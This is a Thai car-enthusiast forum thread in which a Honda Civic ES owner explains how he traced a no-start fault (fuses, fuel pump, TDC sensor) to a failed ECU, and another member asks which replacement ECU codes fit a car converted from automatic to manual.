ตอบ เช็คแล้วตามข้อ 2 เป็นฟิวที่อยู่ในห้องเครื่องขนาด 15A อีกอย่างถ้าไฟไม่มา ECU ไฟรูปเครื่องจะไม่ขึ้นเลย
4. ตรวจสอบดู คือให้บิดสวิชท์กุญแจไปที่ต่ำแหน่ง ST (สตาร์ทเครื่องยนต์) แล้วให้วัดไฟที่จ่ายให้กับหัวฉีด หรือระบบวงจรไฟของวงจรจุดระเบิด หรือไฟที่จ่ายให้กับปั้มติ๊กอย่างหนึ่งอย่างใด ว่ามีไฟจ่ายให้หรือเปล่า
ตอบ ไม่มีไฟจ่ายมา เพราะกล่องตััดไฟ หลังจากเช็คไฟในข้อ 2 แล้ว ผมก็เช็คน้ำมันโดยถอดสายน้ำมันที่ส่งน้ำมันเข้ารางหัวฉีด ซึ่งปกติบิดกุญแจไปที่ on น้ำมันก็ต้องมาแล้ว (เวลาล้างลิ้นปีกผมก็เอาน้ำมันจากตรงนี้มาล้างทุกที) รางหัวฉีด และระบบจุดระเบิดไม่ได้เช็คต่อเพราะถ้าน้ำมันไม่มา อย่างไงก็สตาร์ทไม่ติด
5. ตรวจสอบ TDC sensor
ตอบ TDC ผมเพิ่งเปลี่ยนมาประมาณ 2-3 เดือน และก่อนหน้านี้ไม่ได้มีอาการใด ๆ ที่บ่งชี้ว่า TDC มีปัญหา
6. กล่อง ECU เสีย จะต้องพิสูจน์ให้เห็นจริงว่าเสียที่ส่วนใดเสียก่อน
ตอบ หลังจากเช็คตามที่ผมบอกมาแล้ว เช็คโค๊ดก็อ่านค่าไม่ได้ สิ่งต่อไปที่เช็คได้ก็กล่อง ก็ถอดมันออกมาเปิดฝาดู ภายในสะอาดไม่มีรอยไหม้ ไม่มีกลิ่น ไม่มี Cap ที่ผิดรูป แต่เนื่องจากผมเช็คกล่องเองไม่เป็น ประกอบกับรถต้องใช้ทุกวันเพราะมีรถคันเดียว พอช่างเอากล่องใบใหม่มาเสียบแล้วเครื่องสตาร์ทติดตั้งแต่สตาร์ทครั้งแรก ก็พออนุมานได้ว่ากล่องเสียครับ หากมีเวลาจะลองส่งกล่องไปเช็คอีกทีว่าเสียที่จุดใด สาเหตุที่กล่องเสียคืออะไร แต่คงจะไม่ซ่อมเพราะที่เห็น ๆ ค่าซ่อมอยู่ตั้งแต่ 1500 - 3000 บาท แล้วแต่ว่าจะซ่อมกับใคร ซึ่งราคานี้ผมซื้อที่เชียงกงดีกว่า

สรุปคือ ตอนนี้รถผมถือว่าแก้ปัญหาได้ในระดับหนึ่งแล้ว แต่ยังคาในว่ากล่องเสียเพราะอายุการใช้งานของมัน(อุปกรณ์ในกล่องเสียเอง) หรือเสียเพราะมีสายหรือเซ็นเซอร์ดัวใดตัวหนึ่งช๊อต แล้วไฟย้อนเข้ากล่องทำให้กล่องพัง อันนี้ยังหาคำตอบให้ตัวเองอยู่ครับ
ได้รับคำขอบคุณจาก: dantouch 
komsan2012


ชื่อเล่น: ผมเอ็มคับ

เข้าร่วม: 24 กันยา 2012
ตอบ: 161

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 113
ให้คำขอบคุณ: 4

ที่อยู่: saraburi
พุธ, 20 มกรา 2016 20:22 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
รบกวนคลายสงสัยทีครับ....+++

ผมเห็นมีกล่องขายมากมายหลายรหัด  ถ้าซื้อมาจะใส่ได้เลยมั้ย รหัดไหนไส่ได้บ้าง(เดิมเป็นออโต้ 02  แต่ตอนนี้ใส่เกียร์MT ).....บางคนบอกจะติดอีโม....


-----แล้วทำไมเสียบกล่องสตีมขับปกติ....ที่ไม่ชอบก็คือรู้สึกว่ารถจะวิ่งหน่วงๆอืดๆไปจากเดิมแบบรู้สึกได้เลยอะครับ...
จึงจะหากล่อง civic es มาใส่เหมือนเดิมแต่กลัวไส่ไม่ได้เลยยังไม่กล้าซื้อมา...
 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.